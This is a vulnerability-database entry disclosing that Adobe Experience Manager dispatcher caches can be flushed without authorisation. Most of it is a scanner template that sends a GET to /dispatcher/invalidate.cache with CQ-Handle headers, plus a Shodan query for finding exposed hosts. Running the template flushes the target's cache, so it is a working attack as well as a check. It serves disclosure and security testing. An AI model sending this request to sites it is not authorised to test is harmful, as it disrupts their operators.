aem-cached-pages: Invalidate / Flush Cached Pages on AEM

日期: 2025-08-01 | 影响软件: aemcachedpages | POC: 已公开

漏洞描述

Cached Pages on AEM can be Flushed.

PoC代码[已公开]

id: aem-cached-pages

info:
  name: Invalidate / Flush Cached Pages on AEM
  author: hetroublemakr
  severity: low
  description: Cached Pages on AEM can be Flushed.
  reference:
    - https://twitter.com/AEMSecurity/status/1244965623689609217
  classification:
    cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: adobe
    product: experience_manager
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/dispatcher/invalidate.cache"

    headers:
      CQ-Handle: /content
      CQ-Path: /content

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<H1>OK</H1>"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fc50a19f9059e6dcba12cb34ec59bb67eae82829d20cf18170ff14367ab9cb88022077396adba3ad63981f7e25fce85385eb8c2418c76a284f55fab4c53009a52c57:922c64590222798bb761d5b6d8e72950